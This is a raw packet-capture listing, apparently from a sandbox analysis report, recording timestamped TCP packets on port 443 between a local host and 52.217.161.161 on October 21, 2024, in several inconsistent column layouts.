Oct 21, 2024 17:05:17.325876951 CEST | 443 | 49764 | 52.217.161.161 | 192.168.2.6
Oct 21, 2024 17:05:17.325999975 CEST | 49764 | 443 | 192.168.2.6 | 52.217.161.161
Oct 21, 2024 17:05:17.327971935 CEST | 49764 | 443 | 192.168.2.6 | 52.217.161.161
Oct 21, 2024 17:05:17.327980995 CEST | 443 | 49764 | 52.217.161.161 | 192.168.2.6
Oct 21, 2024 17:05:17.328351021 CEST | 443 | 49764 | 52.217.161.161 | 192.168.2.6
Oct 21, 2024 17:05:17.329818010 CEST | 49764 | 443 | 192.168.2.6 | 52.217.161.161
Oct 21, 2024 17:05:17.371332884 CEST | 443 | 49764 | 52.217.161.161 | 192.168.2.6
Oct 21, 2024 17:05:17.471133947 CEST | 443 | 49764 | 52.217.161.161 | 192.168.2.6
Oct 21, 2024 17:05:17.472496986 CEST | 443 | 49764 | 52.217.161.161 | 192.168.2.6
Oct 21, 2024 17:05:17.472522974 CEST | 443 | 49764 | 52.217.161.161 | 192.168.2.6
Oct 21, 2024 17:05:17.472577095 CEST | 49764 | 443 | 192.168.2.6 | 52.217.161.161
Oct 21, 2024 17:05:17.472588062 CEST | 443 | 49764 | 52.217.161.161 | 192.168.2.6
Oct 21, 2024 17:05:17.472642899 CEST | 49764 | 443 | 192.168.2.6 | 52.217.161.161
Oct 21, 2024 17:05:17.553061008 CEST | 443 | 49764 | 52.217.161.161 | 192.168.2.6
Oct 21, 2024 17:05:17.553097010 CEST | 443 | 49764 | 52.217.161.161 | 192.168.2.6
Oct 21, 2024 17:05:17.553150892 CEST | 49764 | 443 | 192.168.2.6 | 52.217.161.161
Oct 21, 2024 17:05:17.553167105 CEST | 443 | 49764 | 52.217.161.161 | 192.168.2.6
Oct 21, 2024 17:05:17.553212881 CEST | 49764 | 443 | 192.168.2.6 | 52.217.161.161
Oct 21, 2024 17:05:17.554831028 CEST | 443 | 49764 | 52.217.161.161 | 192.168.2.6
Oct 21, 2024 17:05:17.554852962 CEST | 443 | 49764 | 52.217.161.161 | 192.168.2.6
Oct 21, 2024 17:05:17.554896116 CEST | 49764 | 443 | 192.168.2.6 | 52.217.161.161
Oct 21, 2024 17:05:17.554903030 CEST | 443 | 49764 | 52.217.161.161 | 192.168.2.6
Oct 21, 2024 17:05:17.554929972 CEST | 49764 | 443 | 192.168.2.6 | 52.217.161.161
Oct 21, 2024 17:05:17.554953098 CEST | 49764 | 443 | 192.168.2.6 | 52.217.161.161
Oct 21, 2024 17:05:17.634327888 CEST | 443 | 49764 | 52.217.161.161 | 192.168.2.6
Oct 21, 2024 17:05:17.634366989 CEST | 443 | 49764 | 52.217.161.161 | 192.168.2.6
Oct 21, 2024 17:05:17.634440899 CEST | 49764 | 443 | 192.168.2.6 | 52.217.161.161
Oct 21, 2024 17:05:17.634450912 CEST | 443 | 49764 | 52.217.161.161 | 192.168.2.6
Oct 21, 2024 17:05:17.634515047 CEST | 49764 | 443 | 192.168.2.6 | 52.217.161.161
Oct 21, 2024 17:05:17.634520054 CEST | 443 | 49764 | 52.217.161.161 | 192.168.2.6
Oct 21, 2024 17:05:17.635425091 CEST | 443 | 49764 | 52.217.161.161 | 192.168.2.6
                                                                                            Oct 21, 2024 17:05:17.635461092 CEST4434976452.217.161.161192.168.2.6
                                                                                            Oct 21, 2024 17:05:17.635489941 CEST49764443192.168.2.652.217.161.161
                                                                                            Oct 21, 2024 17:05:17.635497093 CEST4434976452.217.161.161192.168.2.6
                                                                                            Oct 21, 2024 17:05:17.635528088 CEST49764443192.168.2.652.217.161.161
                                                                                            Oct 21, 2024 17:05:17.636877060 CEST4434976452.217.161.161192.168.2.6
                                                                                            Oct 21, 2024 17:05:17.636938095 CEST4434976452.217.161.161192.168.2.6
                                                                                            Oct 21, 2024 17:05:17.636949062 CEST49764443192.168.2.652.217.161.161
                                                                                            Oct 21, 2024 17:05:17.636967897 CEST4434976452.217.161.161192.168.2.6
                                                                                            Oct 21, 2024 17:05:17.637001038 CEST49764443192.168.2.652.217.161.161
                                                                                            Oct 21, 2024 17:05:17.637028933 CEST49764443192.168.2.652.217.161.161
                                                                                            Oct 21, 2024 17:05:17.637780905 CEST4434976452.217.161.161192.168.2.6
                                                                                            Oct 21, 2024 17:05:17.637810946 CEST4434976452.217.161.161192.168.2.6
                                                                                            Oct 21, 2024 17:05:17.637845039 CEST49764443192.168.2.652.217.161.161
                                                                                            Oct 21, 2024 17:05:17.637852907 CEST4434976452.217.161.161192.168.2.6
                                                                                            Oct 21, 2024 17:05:17.637875080 CEST49764443192.168.2.652.217.161.161
                                                                                            Oct 21, 2024 17:05:17.637896061 CEST49764443192.168.2.652.217.161.161
                                                                                            Oct 21, 2024 17:05:17.637902021 CEST4434976452.217.161.161192.168.2.6
                                                                                            Oct 21, 2024 17:05:17.638931990 CEST4434976452.217.161.161192.168.2.6
                                                                                            Oct 21, 2024 17:05:17.638969898 CEST4434976452.217.161.161192.168.2.6
                                                                                            Oct 21, 2024 17:05:17.638988972 CEST49764443192.168.2.652.217.161.161
                                                                                            Oct 21, 2024 17:05:17.638995886 CEST4434976452.217.161.161192.168.2.6
                                                                                            Oct 21, 2024 17:05:17.639034986 CEST49764443192.168.2.652.217.161.161
                                                                                            Oct 21, 2024 17:05:17.802866936 CEST49764443192.168.2.652.217.161.161
                                                                                            Oct 21, 2024 17:05:17.802880049 CEST4434976452.217.161.161192.168.2.6
                                                                                            Oct 21, 2024 17:05:17.979847908 CEST4434976452.217.161.161192.168.2.6
                                                                                            Oct 21, 2024 17:05:17.979863882 CEST4434976452.217.161.161192.168.2.6
                                                                                            Oct 21, 2024 17:05:17.979908943 CEST4434976452.217.161.161192.168.2.6
                                                                                            Oct 21, 2024 17:05:17.979922056 CEST4434976452.217.161.161192.168.2.6
                                                                                            Oct 21, 2024 17:05:17.979928970 CEST4434976452.217.161.161192.168.2.6
                                                                                            Oct 21, 2024 17:05:17.979933023 CEST49764443192.168.2.652.217.161.161
                                                                                            Oct 21, 2024 17:05:17.979953051 CEST4434976452.217.161.161192.168.2.6
                                                                                            Oct 21, 2024 17:05:17.979963064 CEST4434976452.217.161.161192.168.2.6
                                                                                            Oct 21, 2024 17:05:17.979994059 CEST49764443192.168.2.652.217.161.161
                                                                                            Oct 21, 2024 17:05:17.980020046 CEST49764443192.168.2.652.217.161.161
                                                                                            Oct 21, 2024 17:05:17.980108023 CEST4434976452.217.161.161192.168.2.6
                                                                                            Oct 21, 2024 17:05:17.980117083 CEST4434976452.217.161.161192.168.2.6
                                                                                            Oct 21, 2024 17:05:17.980151892 CEST49764443192.168.2.652.217.161.161
                                                                                            Oct 21, 2024 17:05:17.980158091 CEST4434976452.217.161.161192.168.2.6
                                                                                            Oct 21, 2024 17:05:17.980166912 CEST4434976452.217.161.161192.168.2.6
                                                                                            Oct 21, 2024 17:05:17.980191946 CEST4434976452.217.161.161192.168.2.6
                                                                                            Oct 21, 2024 17:05:17.980200052 CEST4434976452.217.161.161192.168.2.6
                                                                                            Oct 21, 2024 17:05:17.980207920 CEST49764443192.168.2.652.217.161.161
                                                                                            Oct 21, 2024 17:05:17.980232954 CEST49764443192.168.2.652.217.161.161
                                                                                            Oct 21, 2024 17:05:17.980305910 CEST49764443192.168.2.652.217.161.161
                                                                                            Oct 21, 2024 17:05:17.980319023 CEST4434976452.217.161.161192.168.2.6
                                                                                            Oct 21, 2024 17:05:17.980344057 CEST4434976452.217.161.161192.168.2.6
                                                                                            Oct 21, 2024 17:05:17.980361938 CEST4434976452.217.161.161192.168.2.6
                                                                                            Oct 21, 2024 17:05:17.980370998 CEST4434976452.217.161.161192.168.2.6
                                                                                            Oct 21, 2024 17:05:17.980381966 CEST4434976452.217.161.161192.168.2.6
                                                                                            Oct 21, 2024 17:05:17.980382919 CEST49764443192.168.2.652.217.161.161
                                                                                            Oct 21, 2024 17:05:17.980393887 CEST4434976452.217.161.161192.168.2.6
                                                                                            Oct 21, 2024 17:05:17.980408907 CEST49764443192.168.2.652.217.161.161
                                                                                            Oct 21, 2024 17:05:17.980437040 CEST49764443192.168.2.652.217.161.161
                                                                                            Oct 21, 2024 17:05:17.980443001 CEST4434976452.217.161.161192.168.2.6
                                                                                            Oct 21, 2024 17:05:17.980479002 CEST49764443192.168.2.652.217.161.161
                                                                                            Oct 21, 2024 17:05:19.039995909 CEST4434976452.217.161.161192.168.2.6
                                                                                            Oct 21, 2024 17:05:19.040018082 CEST4434976452.217.161.161192.168.2.6
                                                                                            Oct 21, 2024 17:05:19.040038109 CEST4434976452.217.161.161192.168.2.6
                                                                                            Oct 21, 2024 17:05:19.040129900 CEST49764443192.168.2.652.217.161.161
                                                                                            Oct 21, 2024 17:05:19.040144920 CEST4434976452.217.161.161192.168.2.6
                                                                                            Oct 21, 2024 17:05:19.040191889 CEST49764443192.168.2.652.217.161.161
                                                                                            Oct 21, 2024 17:05:19.040210962 CEST49764443192.168.2.652.217.161.161
                                                                                            Oct 21, 2024 17:05:19.040297985 CEST4434976452.217.161.161192.168.2.6
                                                                                            Oct 21, 2024 17:05:19.040329933 CEST4434976452.217.161.161192.168.2.6
                                                                                            Oct 21, 2024 17:05:19.040405989 CEST49764443192.168.2.652.217.161.161
                                                                                            Oct 21, 2024 17:05:19.040405989 CEST49764443192.168.2.652.217.161.161
                                                                                            Oct 21, 2024 17:05:19.040412903 CEST4434976452.217.161.161192.168.2.6
                                                                                            Oct 21, 2024 17:05:19.040467024 CEST49764443192.168.2.652.217.161.161
                                                                                            Oct 21, 2024 17:05:19.040944099 CEST4434976452.217.161.161192.168.2.6
                                                                                            Oct 21, 2024 17:05:19.040965080 CEST4434976452.217.161.161192.168.2.6
                                                                                            Oct 21, 2024 17:05:19.041004896 CEST49764443192.168.2.652.217.161.161
                                                                                            Oct 21, 2024 17:05:19.041017056 CEST4434976452.217.161.161192.168.2.6
                                                                                            Oct 21, 2024 17:05:19.041038036 CEST49764443192.168.2.652.217.161.161
                                                                                            Oct 21, 2024 17:05:19.041059971 CEST49764443192.168.2.652.217.161.161
                                                                                            Oct 21, 2024 17:05:19.041064024 CEST4434976452.217.161.161192.168.2.6
                                                                                            Oct 21, 2024 17:05:19.041377068 CEST4434976452.217.161.161192.168.2.6
                                                                                            Oct 21, 2024 17:05:19.041412115 CEST4434976452.217.161.161192.168.2.6
                                                                                            Oct 21, 2024 17:05:19.041440964 CEST49764443192.168.2.652.217.161.161
                                                                                            Oct 21, 2024 17:05:19.041446924 CEST4434976452.217.161.161192.168.2.6
                                                                                            Oct 21, 2024 17:05:19.041480064 CEST49764443192.168.2.652.217.161.161
                                                                                            Oct 21, 2024 17:05:19.041578054 CEST4434976452.217.161.161192.168.2.6
                                                                                            Oct 21, 2024 17:05:19.041594028 CEST4434976452.217.161.161192.168.2.6
                                                                                            Oct 21, 2024 17:05:19.041645050 CEST49764443192.168.2.652.217.161.161
                                                                                            Oct 21, 2024 17:05:19.041651011 CEST4434976452.217.161.161192.168.2.6
                                                                                            Oct 21, 2024 17:05:19.041851997 CEST4434976452.217.161.161192.168.2.6
                                                                                            Oct 21, 2024 17:05:19.041884899 CEST4434976452.217.161.161192.168.2.6
                                                                                            Oct 21, 2024 17:05:19.041910887 CEST49764443192.168.2.652.217.161.161
                                                                                            Oct 21, 2024 17:05:19.041918039 CEST4434976452.217.161.161192.168.2.6
                                                                                            Oct 21, 2024 17:05:19.041935921 CEST49764443192.168.2.652.217.161.161
                                                                                            Oct 21, 2024 17:05:19.046278954 CEST4434976452.217.161.161192.168.2.6
                                                                                            Oct 21, 2024 17:05:19.046349049 CEST49764443192.168.2.652.217.161.161
                                                                                            Oct 21, 2024 17:05:19.046355963 CEST4434976452.217.161.161192.168.2.6
                                                                                            Oct 21, 2024 17:05:19.046406984 CEST49764443192.168.2.652.217.161.161
                                                                                            Oct 21, 2024 17:05:19.046433926 CEST4434976452.217.161.161192.168.2.6
                                                                                            Oct 21, 2024 17:05:19.046586990 CEST4434976452.217.161.161192.168.2.6
                                                                                            Oct 21, 2024 17:05:19.046616077 CEST4434976452.217.161.161192.168.2.6
                                                                                            Oct 21, 2024 17:05:19.046646118 CEST49764443192.168.2.652.217.161.161
                                                                                            Oct 21, 2024 17:05:19.046653032 CEST4434976452.217.161.161192.168.2.6
                                                                                            Oct 21, 2024 17:05:19.046678066 CEST49764443192.168.2.652.217.161.161
                                                                                            Oct 21, 2024 17:05:19.046788931 CEST4434976452.217.161.161192.168.2.6
                                                                                            Oct 21, 2024 17:05:19.046812057 CEST4434976452.217.161.161192.168.2.6
                                                                                            Oct 21, 2024 17:05:19.046838045 CEST49764443192.168.2.652.217.161.161
                                                                                            Oct 21, 2024 17:05:19.046844006 CEST4434976452.217.161.161192.168.2.6
                                                                                            Oct 21, 2024 17:05:19.046875000 CEST49764443192.168.2.652.217.161.161
                                                                                            Oct 21, 2024 17:05:19.046905041 CEST49764443192.168.2.652.217.161.161
                                                                                            Oct 21, 2024 17:05:19.046909094 CEST4434976452.217.161.161192.168.2.6
                                                                                            Oct 21, 2024 17:05:19.049546003 CEST4434976452.217.161.161192.168.2.6
                                                                                            Oct 21, 2024 17:05:19.049563885 CEST4434976452.217.161.161192.168.2.6
                                                                                            Oct 21, 2024 17:05:19.049642086 CEST49764443192.168.2.652.217.161.161
                                                                                            Oct 21, 2024 17:05:19.049648046 CEST4434976452.217.161.161192.168.2.6
                                                                                            Oct 21, 2024 17:05:19.049855947 CEST4434976452.217.161.161192.168.2.6
                                                                                            Oct 21, 2024 17:05:19.049896002 CEST4434976452.217.161.161192.168.2.6
                                                                                            Oct 21, 2024 17:05:19.049923897 CEST49764443192.168.2.652.217.161.161
                                                                                            Oct 21, 2024 17:05:19.049931049 CEST4434976452.217.161.161192.168.2.6
                                                                                            Oct 21, 2024 17:05:19.050050974 CEST4434976452.217.161.161192.168.2.6
                                                                                            Oct 21, 2024 17:05:19.050081015 CEST4434976452.217.161.161192.168.2.6
                                                                                            Oct 21, 2024 17:05:19.050098896 CEST49764443192.168.2.652.217.161.161
                                                                                            Oct 21, 2024 17:05:19.050106049 CEST4434976452.217.161.161192.168.2.6
                                                                                            Oct 21, 2024 17:05:19.050136089 CEST49764443192.168.2.652.217.161.161
                                                                                            Oct 21, 2024 17:05:19.050163984 CEST49764443192.168.2.652.217.161.161
                                                                                            Oct 21, 2024 17:05:19.051275969 CEST4434976452.217.161.161192.168.2.6
                                                                                            Oct 21, 2024 17:05:19.051295042 CEST4434976452.217.161.161192.168.2.6
                                                                                            Oct 21, 2024 17:05:19.051331043 CEST49764443192.168.2.652.217.161.161
                                                                                            Oct 21, 2024 17:05:19.051337957 CEST4434976452.217.161.161192.168.2.6
                                                                                            Oct 21, 2024 17:05:19.051367044 CEST49764443192.168.2.652.217.161.161
                                                                                            Oct 21, 2024 17:05:19.051467896 CEST49764443192.168.2.652.217.161.161
                                                                                            Oct 21, 2024 17:05:19.051471949 CEST4434976452.217.161.161192.168.2.6
                                                                                            Oct 21, 2024 17:05:19.053292036 CEST4434976452.217.161.161192.168.2.6
                                                                                            Oct 21, 2024 17:05:19.053313017 CEST4434976452.217.161.161192.168.2.6
                                                                                            Oct 21, 2024 17:05:19.053354979 CEST49764443192.168.2.652.217.161.161
                                                                                            Oct 21, 2024 17:05:19.053360939 CEST4434976452.217.161.161192.168.2.6
                                                                                            Oct 21, 2024 17:05:19.053392887 CEST49764443192.168.2.652.217.161.161
                                                                                            Oct 21, 2024 17:05:19.053497076 CEST4434976452.217.161.161192.168.2.6
                                                                                            Oct 21, 2024 17:05:19.053538084 CEST4434976452.217.161.161192.168.2.6
                                                                                            Oct 21, 2024 17:05:19.053574085 CEST49764443192.168.2.652.217.161.161
                                                                                            Oct 21, 2024 17:05:19.053582907 CEST4434976452.217.161.161192.168.2.6
                                                                                            Oct 21, 2024 17:05:19.053594112 CEST49764443192.168.2.652.217.161.161
                                                                                            Oct 21, 2024 17:05:19.053831100 CEST4434976452.217.161.161192.168.2.6
                                                                                            Oct 21, 2024 17:05:19.053852081 CEST4434976452.217.161.161192.168.2.6
                                                                                            Oct 21, 2024 17:05:19.053894043 CEST49764443192.168.2.652.217.161.161
                                                                                            Oct 21, 2024 17:05:19.053900003 CEST4434976452.217.161.161192.168.2.6
                                                                                            Oct 21, 2024 17:05:19.053925037 CEST49764443192.168.2.652.217.161.161
                                                                                            Oct 21, 2024 17:05:19.054330111 CEST4434976452.217.161.161192.168.2.6
                                                                                            Oct 21, 2024 17:05:19.054343939 CEST4434976452.217.161.161192.168.2.6
                                                                                            Oct 21, 2024 17:05:19.054382086 CEST49764443192.168.2.652.217.161.161
                                                                                            Oct 21, 2024 17:05:19.054388046 CEST4434976452.217.161.161192.168.2.6
                                                                                            Oct 21, 2024 17:05:19.054408073 CEST49764443192.168.2.652.217.161.161
                                                                                            Oct 21, 2024 17:05:19.054764032 CEST4434976452.217.161.161192.168.2.6
                                                                                            Oct 21, 2024 17:05:19.054792881 CEST4434976452.217.161.161192.168.2.6
                                                                                            Oct 21, 2024 17:05:19.054816008 CEST49764443192.168.2.652.217.161.161
                                                                                            Oct 21, 2024 17:05:19.054824114 CEST4434976452.217.161.161192.168.2.6
                                                                                            Oct 21, 2024 17:05:19.054841042 CEST49764443192.168.2.652.217.161.161
                                                                                            Oct 21, 2024 17:05:19.055259943 CEST4434976452.217.161.161192.168.2.6
                                                                                            Oct 21, 2024 17:05:19.055274963 CEST4434976452.217.161.161192.168.2.6
                                                                                            Oct 21, 2024 17:05:19.055351019 CEST49764443192.168.2.652.217.161.161
                                                                                            Oct 21, 2024 17:05:19.055356979 CEST4434976452.217.161.161192.168.2.6
                                                                                            Oct 21, 2024 17:05:19.055551052 CEST4434976452.217.161.161192.168.2.6
                                                                                            Oct 21, 2024 17:05:19.055568933 CEST4434976452.217.161.161192.168.2.6
                                                                                            Oct 21, 2024 17:05:19.055686951 CEST49764443192.168.2.652.217.161.161
                                                                                            Oct 21, 2024 17:05:19.058890104 CEST49764443192.168.2.652.217.161.161
                                                                                            Oct 21, 2024 17:05:19.058897972 CEST4434976452.217.161.161192.168.2.6
                                                                                            Oct 21, 2024 17:05:19.058916092 CEST4434976452.217.161.161192.168.2.6
                                                                                            Oct 21, 2024 17:05:19.058926105 CEST4434976452.217.161.161192.168.2.6
                                                                                            Oct 21, 2024 17:05:19.059012890 CEST49764443192.168.2.652.217.161.161
                                                                                            Oct 21, 2024 17:05:19.059021950 CEST4434976452.217.161.161192.168.2.6
                                                                                            Oct 21, 2024 17:05:19.059039116 CEST4434976452.217.161.161192.168.2.6
                                                                                            Oct 21, 2024 17:05:19.059053898 CEST4434976452.217.161.161192.168.2.6
                                                                                            Oct 21, 2024 17:05:19.059151888 CEST49764443192.168.2.652.217.161.161
                                                                                            Oct 21, 2024 17:05:19.059156895 CEST4434976452.217.161.161192.168.2.6
                                                                                            Oct 21, 2024 17:05:19.059160948 CEST4434976452.217.161.161192.168.2.6
                                                                                            Oct 21, 2024 17:05:19.059211969 CEST49764443192.168.2.652.217.161.161
                                                                                            Oct 21, 2024 17:05:19.059231997 CEST49764443192.168.2.652.217.161.161
Oct 21, 2024 17:05:19.059398890 CEST  49764  443    192.168.2.6     52.217.161.161
Oct 21, 2024 17:05:19.059464931 CEST  443    49764  52.217.161.161  192.168.2.6
Oct 21, 2024 17:05:19.059483051 CEST  49764  443    192.168.2.6     52.217.161.161
Oct 21, 2024 17:05:19.059489012 CEST  443    49764  52.217.161.161  192.168.2.6
Oct 21, 2024 17:05:19.059511900 CEST  49764  443    192.168.2.6     52.217.161.161
Oct 21, 2024 17:05:19.059519053 CEST  443    49764  52.217.161.161  192.168.2.6
Oct 21, 2024 17:05:19.059542894 CEST  49764  443    192.168.2.6     52.217.161.161
Oct 21, 2024 17:05:19.059751034 CEST  443    49764  52.217.161.161  192.168.2.6
Oct 21, 2024 17:05:19.059793949 CEST  443    49764  52.217.161.161  192.168.2.6
Oct 21, 2024 17:05:19.059798956 CEST  49764  443    192.168.2.6     52.217.161.161
Oct 21, 2024 17:05:19.059807062 CEST  443    49764  52.217.161.161  192.168.2.6
Oct 21, 2024 17:05:19.059839964 CEST  49764  443    192.168.2.6     52.217.161.161
Oct 21, 2024 17:05:19.059864044 CEST  49764  443    192.168.2.6     52.217.161.161
Oct 21, 2024 17:05:19.060030937 CEST  49764  443    192.168.2.6     52.217.161.161
Oct 21, 2024 17:05:19.060067892 CEST  49764  443    192.168.2.6     52.217.161.161
Oct 21, 2024 17:05:19.060318947 CEST  443    49764  52.217.161.161  192.168.2.6
Oct 21, 2024 17:05:19.060333967 CEST  443    49764  52.217.161.161  192.168.2.6
Oct 21, 2024 17:05:19.060354948 CEST  443    49764  52.217.161.161  192.168.2.6
Oct 21, 2024 17:05:19.060374975 CEST  49764  443    192.168.2.6     52.217.161.161
Oct 21, 2024 17:05:19.060381889 CEST  443    49764  52.217.161.161  192.168.2.6
Oct 21, 2024 17:05:19.060400963 CEST  49764  443    192.168.2.6     52.217.161.161
Oct 21, 2024 17:05:19.060621977 CEST  443    49764  52.217.161.161  192.168.2.6
Oct 21, 2024 17:05:19.060642958 CEST  443    49764  52.217.161.161  192.168.2.6
Oct 21, 2024 17:05:19.060672998 CEST  49764  443    192.168.2.6     52.217.161.161
Oct 21, 2024 17:05:19.060679913 CEST  443    49764  52.217.161.161  192.168.2.6
Oct 21, 2024 17:05:19.060698032 CEST  49764  443    192.168.2.6     52.217.161.161
Oct 21, 2024 17:05:19.061208010 CEST  443    49764  52.217.161.161  192.168.2.6
Oct 21, 2024 17:05:19.061223030 CEST  443    49764  52.217.161.161  192.168.2.6
Oct 21, 2024 17:05:19.061269045 CEST  49764  443    192.168.2.6     52.217.161.161
Oct 21, 2024 17:05:19.061275005 CEST  443    49764  52.217.161.161  192.168.2.6
Oct 21, 2024 17:05:19.061291933 CEST  49764  443    192.168.2.6     52.217.161.161
Oct 21, 2024 17:05:19.061404943 CEST  443    49764  52.217.161.161  192.168.2.6
Oct 21, 2024 17:05:19.061422110 CEST  443    49764  52.217.161.161  192.168.2.6
Oct 21, 2024 17:05:19.061456919 CEST  49764  443    192.168.2.6     52.217.161.161
Oct 21, 2024 17:05:19.061463118 CEST  443    49764  52.217.161.161  192.168.2.6
Oct 21, 2024 17:05:19.061484098 CEST  49764  443    192.168.2.6     52.217.161.161
Oct 21, 2024 17:05:19.061484098 CEST  49764  443    192.168.2.6     52.217.161.161
Oct 21, 2024 17:05:19.061983109 CEST  443    49764  52.217.161.161  192.168.2.6
Oct 21, 2024 17:05:19.062011003 CEST  443    49764  52.217.161.161  192.168.2.6
Oct 21, 2024 17:05:19.062041998 CEST  49764  443    192.168.2.6     52.217.161.161
Oct 21, 2024 17:05:19.062050104 CEST  443    49764  52.217.161.161  192.168.2.6
Oct 21, 2024 17:05:19.062076092 CEST  49764  443    192.168.2.6     52.217.161.161
Oct 21, 2024 17:05:19.062105894 CEST  49764  443    192.168.2.6     52.217.161.161
Oct 21, 2024 17:05:19.062340975 CEST  443    49764  52.217.161.161  192.168.2.6
Oct 21, 2024 17:05:19.062356949 CEST  443    49764  52.217.161.161  192.168.2.6
Oct 21, 2024 17:05:19.062382936 CEST  49764  443    192.168.2.6     52.217.161.161
Oct 21, 2024 17:05:19.062391043 CEST  443    49764  52.217.161.161  192.168.2.6
Oct 21, 2024 17:05:19.062411070 CEST  49764  443    192.168.2.6     52.217.161.161
Oct 21, 2024 17:05:19.062596083 CEST  443    49764  52.217.161.161  192.168.2.6
Oct 21, 2024 17:05:19.062622070 CEST  443    49764  52.217.161.161  192.168.2.6
Oct 21, 2024 17:05:19.062650919 CEST  49764  443    192.168.2.6     52.217.161.161
Oct 21, 2024 17:05:19.062657118 CEST  443    49764  52.217.161.161  192.168.2.6
Oct 21, 2024 17:05:19.062674999 CEST  49764  443    192.168.2.6     52.217.161.161
Oct 21, 2024 17:05:19.062712908 CEST  49764  443    192.168.2.6     52.217.161.161
Oct 21, 2024 17:05:19.062885046 CEST  443    49764  52.217.161.161  192.168.2.6
Oct 21, 2024 17:05:19.062901020 CEST  443    49764  52.217.161.161  192.168.2.6
Oct 21, 2024 17:05:19.062928915 CEST  443    49764  52.217.161.161  192.168.2.6
Oct 21, 2024 17:05:19.062952995 CEST  49764  443    192.168.2.6     52.217.161.161
Oct 21, 2024 17:05:19.062959909 CEST  443    49764  52.217.161.161  192.168.2.6
Oct 21, 2024 17:05:19.063384056 CEST  443    49764  52.217.161.161  192.168.2.6
Oct 21, 2024 17:05:19.063405991 CEST  443    49764  52.217.161.161  192.168.2.6
Oct 21, 2024 17:05:19.063446045 CEST  49764  443    192.168.2.6     52.217.161.161
Oct 21, 2024 17:05:19.063452959 CEST  443    49764  52.217.161.161  192.168.2.6
Oct 21, 2024 17:05:19.063466072 CEST  49764  443    192.168.2.6     52.217.161.161
Oct 21, 2024 17:05:19.063649893 CEST  49764  443    192.168.2.6     52.217.161.161
Oct 21, 2024 17:05:19.063707113 CEST  443    49764  52.217.161.161  192.168.2.6
Oct 21, 2024 17:05:19.063724041 CEST  443    49764  52.217.161.161  192.168.2.6
Oct 21, 2024 17:05:19.063762903 CEST  49764  443    192.168.2.6     52.217.161.161
Oct 21, 2024 17:05:19.063769102 CEST  443    49764  52.217.161.161  192.168.2.6
Oct 21, 2024 17:05:19.063791990 CEST  49764  443    192.168.2.6     52.217.161.161
Oct 21, 2024 17:05:19.063816071 CEST  49764  443    192.168.2.6     52.217.161.161
Oct 21, 2024 17:05:19.063819885 CEST  443    49764  52.217.161.161  192.168.2.6
Oct 21, 2024 17:05:19.063894033 CEST  443    49764  52.217.161.161  192.168.2.6
Oct 21, 2024 17:05:19.063918114 CEST  443    49764  52.217.161.161  192.168.2.6
Oct 21, 2024 17:05:19.063945055 CEST  49764  443    192.168.2.6     52.217.161.161
Oct 21, 2024 17:05:19.063952923 CEST  443    49764  52.217.161.161  192.168.2.6
Oct 21, 2024 17:05:19.063978910 CEST  49764  443    192.168.2.6     52.217.161.161
Oct 21, 2024 17:05:19.064244986 CEST  443    49764  52.217.161.161  192.168.2.6
Oct 21, 2024 17:05:19.064260006 CEST  443    49764  52.217.161.161  192.168.2.6
Oct 21, 2024 17:05:19.064294100 CEST  49764  443    192.168.2.6     52.217.161.161
Oct 21, 2024 17:05:19.064300060 CEST  443    49764  52.217.161.161  192.168.2.6
Oct 21, 2024 17:05:19.064321995 CEST  49764  443    192.168.2.6     52.217.161.161
Oct 21, 2024 17:05:19.064677954 CEST  443    49764  52.217.161.161  192.168.2.6
Oct 21, 2024 17:05:19.064699888 CEST  443    49764  52.217.161.161  192.168.2.6
Oct 21, 2024 17:05:19.064743042 CEST  49764  443    192.168.2.6     52.217.161.161
Oct 21, 2024 17:05:19.064749956 CEST  443    49764  52.217.161.161  192.168.2.6
Oct 21, 2024 17:05:19.064770937 CEST  49764  443    192.168.2.6     52.217.161.161
Oct 21, 2024 17:05:19.065052032 CEST  443    49764  52.217.161.161  192.168.2.6
Oct 21, 2024 17:05:19.065067053 CEST  443    49764  52.217.161.161  192.168.2.6
Oct 21, 2024 17:05:19.065116882 CEST  49764  443    192.168.2.6     52.217.161.161
Oct 21, 2024 17:05:19.065124989 CEST  443    49764  52.217.161.161  192.168.2.6
Oct 21, 2024 17:05:19.065136909 CEST  49764  443    192.168.2.6     52.217.161.161
Oct 21, 2024 17:05:19.065277100 CEST  443    49764  52.217.161.161  192.168.2.6
Oct 21, 2024 17:05:19.065296888 CEST  443    49764  52.217.161.161  192.168.2.6
Oct 21, 2024 17:05:19.065330982 CEST  49764  443    192.168.2.6     52.217.161.161
Oct 21, 2024 17:05:19.065337896 CEST  443    49764  52.217.161.161  192.168.2.6
Oct 21, 2024 17:05:19.065367937 CEST  49764  443    192.168.2.6     52.217.161.161
Oct 21, 2024 17:05:19.065565109 CEST  443    49764  52.217.161.161  192.168.2.6
Oct 21, 2024 17:05:19.065594912 CEST  443    49764  52.217.161.161  192.168.2.6
Oct 21, 2024 17:05:19.065623999 CEST  49764  443    192.168.2.6     52.217.161.161
Oct 21, 2024 17:05:19.065629959 CEST  443    49764  52.217.161.161  192.168.2.6
Oct 21, 2024 17:05:19.065654993 CEST  49764  443    192.168.2.6     52.217.161.161
Oct 21, 2024 17:05:19.065681934 CEST  49764  443    192.168.2.6     52.217.161.161
Oct 21, 2024 17:05:19.066240072 CEST  443    49764  52.217.161.161  192.168.2.6
Oct 21, 2024 17:05:19.066277981 CEST  443    49764  52.217.161.161  192.168.2.6
Oct 21, 2024 17:05:19.066306114 CEST  49764  443    192.168.2.6     52.217.161.161
Oct 21, 2024 17:05:19.066310883 CEST  443    49764  52.217.161.161  192.168.2.6
Oct 21, 2024 17:05:19.066340923 CEST  49764  443    192.168.2.6     52.217.161.161
Oct 21, 2024 17:05:19.066451073 CEST  443    49764  52.217.161.161  192.168.2.6
Oct 21, 2024 17:05:19.066488981 CEST  443    49764  52.217.161.161  192.168.2.6
Oct 21, 2024 17:05:19.066519976 CEST  49764  443    192.168.2.6     52.217.161.161
Oct 21, 2024 17:05:19.066525936 CEST  443    49764  52.217.161.161  192.168.2.6
Oct 21, 2024 17:05:19.066554070 CEST  49764  443    192.168.2.6     52.217.161.161
Oct 21, 2024 17:05:19.066634893 CEST  443    49764  52.217.161.161  192.168.2.6
Oct 21, 2024 17:05:19.066660881 CEST  443    49764  52.217.161.161  192.168.2.6
Oct 21, 2024 17:05:19.066684961 CEST  49764  443    192.168.2.6     52.217.161.161
Oct 21, 2024 17:05:19.066692114 CEST  443    49764  52.217.161.161  192.168.2.6
Oct 21, 2024 17:05:19.066725969 CEST  49764  443    192.168.2.6     52.217.161.161
Oct 21, 2024 17:05:19.066956997 CEST  443    49764  52.217.161.161  192.168.2.6
